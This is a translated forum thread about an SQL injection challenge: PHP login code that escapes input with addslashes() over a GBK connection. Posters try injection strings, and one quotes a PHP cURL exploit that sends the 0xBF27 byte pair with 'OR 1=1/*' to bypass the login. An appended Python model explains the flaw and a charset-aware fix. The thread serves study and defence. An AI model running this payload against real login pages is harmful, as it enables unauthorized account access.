Hertz

SQLI Challenge 1


The source code of a page is given.

What would be the ideal query for extracting the data / logging in as Admin?


<?php

// Challenge code as posted. The Database class, htmlDisplayError(),
// htmlDisplayMessage() and the ADDSLASH_* constants are defined elsewhere
// in the challenge and are not shown here.
function asvsmysql_login($username, $password)
{
    // addslashes() escapes byte by byte and knows nothing about the
    // connection charset; the password is hashed, so it is never interpolated raw.
    $username = addslashes($username);
    $password = md5($password);

    $db = new Database();
    $db->setHost('localhost');
    $db->setDatabase(ADDSLASH_DATABASE);
    $db->setUser(ADDSLASH_USERNAME);
    $db->setPassword(ADDSLASH_PASSWORD);
    if (false === $db->connect()) {
        return htmlDisplayError('Conectare nereusita.');
    }

    // The connection is switched to GBK, a multi-byte charset, so the server
    // parses the query in characters while the escaping above was done in bytes.
    $db->query("SET NAMES GBK");
    $db->query("SET CHARACTER SET GBK");

    // The escaped values are interpolated straight into the SQL string.
    $query = "SELECT username FROM users WHERE username='$username' AND password='$password'";

    if (false === ($result = $db->queryFirst($query))) {
        return htmlDisplayError('User/Parola gresite..');
    }

    if ($result['username'] !== 'Admin') {
        return htmlDisplayError('Esti logat,dar nu ca Admin.');
    }

    return htmlDisplayMessage('Esti logat,felicitari!');
}

?>


username='$username' and password='$password' - Shouldn't you have used double quotes?

And I don't see how the function could be called from the browser... Let's assume we use GET for username and password:

username=Admin

password=' OR 1=1'

Something like that. Login bypass.

Edit: That's wrong, I didn't look properly at first. :)

Edited by Nytro

Nice idea.

It would be tempting to build a simple site with the code above... but I suppose finding the solution only requires reading the code?

...

I might get to it later (though I don't know if I have time today) to put the source and a database on a host and offer the site for attempts. I like the idea.

PS I think you meant ' OR 1 OR ' or ' OR 1=1 OR '


I've tried plenty; indeed, the idea would be to end up with a query like

FROM users WHERE username='admin' OR 1 OR 'ceva' AND password=''";

addslashes turns ' into \' and it seems the only viable method is using UTF8 characters (the site is in an Asian language, so it accepts them, as michee said)

The problem is that all my attempts failed; the program has to be tested separately, since by eye the slightest mistake behaves the same way.


I only found this, but right now I have neither the time nor a host to put it on to try.

SQL Injection - Hakipedia

In rare cases under certain conditions, filters such as addslashes() and magic_quotes_gpc can be bypassed when the vulnerable SQL server is using certain character sets such as the GBK character set.

In GBK, the hex value of 0xbf27 is not a valid multi-byte character, however, the hex value of 0xbf5c is. If the characters are construed as single-byte characters, 0xbf5c is 0xbf (¿) followed by 0x5c (\); ¿\. And 0xbf27 is 0x27 (') following a 0xbf (¿); ¿'.

This comes in handy when single quotes are escaped with a backslash (\) using addslashes() or when magic_quotes_gpc is turned on. Although it appears at first that the injection point is blocked via one of these methods, we can bypass this by using 0xbf27. By injecting this hex code, addslashes() will modify 0xbf27 to become 0xbf5c27, which is a valid multi-byte character (0xbf5c) followed by a non-escaped inverted comma. In other words, 0xbf5c is recognised as a single character, so the backslash is useless, and the quote is not escaped.

Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection:


<?php
// cURL script as given on Hakipedia; victimsite.com and the session id are
// placeholder values from that page.
$url = "http://www.victimsite.com/login.php";
$ref = "http://www.victimsite.com/index.php";
$session = "PHPSESSID=abcdefg01234567890abcdefg";

$ch = curl_init();

curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_REFERER, $ref );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE );
curl_setopt( $ch, CURLOPT_COOKIE, $session );
curl_setopt( $ch, CURLOPT_POST, TRUE );
// The username field carries the raw bytes 0xbf 0x27 (lead byte plus quote)
// described above, followed by the rest of the statement.
curl_setopt( $ch, CURLOPT_POSTFIELDS, "username=" .
    chr(0xbf) . chr(0x27) .
    "OR 1=1/*&submit=1" );

$data = curl_exec( $ch );

print( $data );
curl_close( $ch );
?>

The CURLOPT_POSTFIELDS line sets the characters to be passed as multi-byte characters, and finishes the statement with OR 1=1/*, thus creating an injection that will bypass the addslashes() and/or magic_quotes_gpc checking.
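As an added example, not code from the thread or from Hakipedia, the following Python models the mechanism that both the challenge code and the Hakipedia text describe: addslashes() is re-implemented byte for byte, the server's parse is modelled by decoding the query bytes in the connection charset, and a character-aware escaper is shown beside it. That second escaper has the property mysql_real_escape_string() gains once the client library has been told the charset with mysql_set_charset() (a prepared statement avoids the problem entirely, since no escaping is done at all). It goes slightly beyond the page by comparing a single-byte and a multi-byte connection charset on the same escaped bytes and by running a benign name through the hardened path. All function names and the sample bytes are constructed for this example.

```python
# Added example, not code from the thread or from Hakipedia.  It models the
# addslashes()/GBK mismatch: the escaper works on bytes while the server parses
# characters in the connection charset.  Function names and sample input are
# constructed for this example.

# ' " \ and NUL: the characters addslashes() and MySQL escaping both care about.
ESCAPES = {"'": "\\'", '"': '\\"', "\\": "\\\\", "\0": "\\0"}


def addslashes(data: bytes) -> bytes:
    """Byte-oriented model of PHP's addslashes(): a backslash before ' " and \\,
    NUL rewritten as \\0, with no knowledge of multi-byte characters."""
    out = bytearray()
    for b in data:
        if b == 0x00:
            out += b"\\0"
        elif b in (0x27, 0x22, 0x5C):
            out += bytes((0x5C, b))
        else:
            out.append(b)
    return bytes(out)


def escape_charset_aware(data: bytes, charset: str) -> bytes:
    """Character-oriented escaping: decode in the connection charset, escape per
    character, re-encode.  Strict decoding means an invalid sequence such as
    0xBF27 in GBK raises instead of being split into a lead byte plus a quote."""
    text = data.decode(charset)  # UnicodeDecodeError on an invalid sequence
    return "".join(ESCAPES.get(ch, ch) for ch in text).encode(charset)


def rejects(data: bytes, charset: str) -> bool:
    """True when the charset-aware escaper refuses the input as malformed."""
    try:
        escape_charset_aware(data, charset)
    except UnicodeDecodeError:
        return True
    return False


def live_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes that reach the SQL parser unescaped after the server
    decodes the query bytes in the connection charset.  A backslash escapes the
    character that follows it, as in MySQL string literals."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # the next character is escaped; skip both
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count


def build_query(username: bytes, password_md5: str, escaper) -> bytes:
    """The challenge's string-built query, with the username escaper pluggable."""
    return (b"SELECT username FROM users WHERE username='" + escaper(username)
            + b"' AND password='" + password_md5.encode("ascii") + b"'")


# Constructed input: GBK lead byte 0xBF followed by a single quote, as on the page.
SAMPLE = b"\xbf\x27 OR 1=1/*"

if __name__ == "__main__":
    naive = addslashes(SAMPLE)
    print("addslashes():", naive)
    for cs in ("latin1", "gbk"):
        print(f"  live quotes when the connection charset is {cs}: {live_quotes(naive, cs)}")
    print("charset-aware escaper rejects the bytes:", rejects(SAMPLE, "gbk"))
    print("benign name escaped per character:", escape_charset_aware(b"O'Brien", "gbk"))
```

The same escaped bytes yield no live quote on a latin1 connection and one on a GBK connection, because 0xBF5C decodes to a single GBK character and the backslash disappears into it. The hardened escaper never produces that byte pattern: it either escapes the quote as a character of the connection's charset or refuses the malformed sequence, which is also a useful signal to log.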
